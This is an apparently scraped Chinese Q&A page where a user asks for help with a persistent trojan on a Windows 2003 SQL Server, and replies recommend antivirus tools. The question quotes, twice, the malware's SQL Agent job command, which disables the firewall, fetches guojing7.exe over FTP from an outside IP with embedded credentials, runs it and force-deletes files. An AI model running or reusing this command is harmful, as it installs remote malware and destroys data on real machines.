UC知道史上最变态SQL病毒,guojing7.exe
来源:百度知道 编辑:UC知道 时间:2024/06/08 06:18:18
中了一个史上最顽固超阴超狠的SQL木马!
这个木马最特别的地方,就是查不出来源,删除了一样会复活。
重装win2003和SQL SERVER都没用。
这个木马的整个流程: 木马源(不知道在什么地方)——自动运行SQL server Agent——生成名字叫“X”的自动作业——x通过运行ftp.exe,自动链接到222.208.183.101 下载木马——运行DoIt.bat安装木马,然后自动删除DoIt.bat
其中名字叫“X”的自动作业执行的指令是:
Cmd.exe /c del ias\ias.mdb&del ias\dnary.mdb&Start net1 stop sharedaccess&Md str312146&Cd str312146&Cacls %windir%\system32\ftp.exe /c /e /p EveryOne:F&Echo Open 222.208.183.101 >k.w&echo admin >>k.w&echo 123456 >>k.w&echo get guojing7.exe
>>k.w&echo bye >>k.w&ftp -i -s:k.w&del k.w&Cacls %windir%\system32\ftp.exe /C /E /P EveryOne:N&echo for %%i in (*.exe) do start %%i>DoIt.bat&ping -n 10 127.0.0.1&DoIt.bat&del DoIt.bat&&del *.* /f /s /q
这个木马最特别的地方,就是查不出来源,删除了一样会复活。
重装win2003和SQL SERVER都没用。
这个木马的整个流程: 木马源(不知道在什么地方)——自动运行SQL server Agent——生成名字叫“X”的自动作业——x通过运行ftp.exe,自动链接到222.208.183.101 下载木马——运行DoIt.bat安装木马,然后自动删除DoIt.bat
其中名字叫“X”的自动作业执行的指令是:
Cmd.exe /c del ias\ias.mdb&del ias\dnary.mdb&Start net1 stop sharedaccess&Md str312146&Cd str312146&Cacls %windir%\system32\ftp.exe /c /e /p EveryOne:F&Echo Open 222.208.183.101 >k.w&echo admin >>k.w&echo 123456 >>k.w&echo get guojing7.exe
>>k.w&echo bye >>k.w&ftp -i -s:k.w&del k.w&Cacls %windir%\system32\ftp.exe /C /E /P EveryOne:N&echo for %%i in (*.exe) do start %%i>DoIt.bat&ping -n 10 127.0.0.1&DoIt.bat&del DoIt.bat&&del *.* /f /s /q
TrojanHunter5.0.962杀木马效果绝对很好 杀不落再问我 (别点快车)
http://www.onlinedown.net/soft/34273.htm
去腾讯智慧安全申请一个御点终端全系统
然后去安装腾讯御点,可以修复漏洞和杀毒的
左侧可以看到有个病毒查杀功能,使用这个功能去杀毒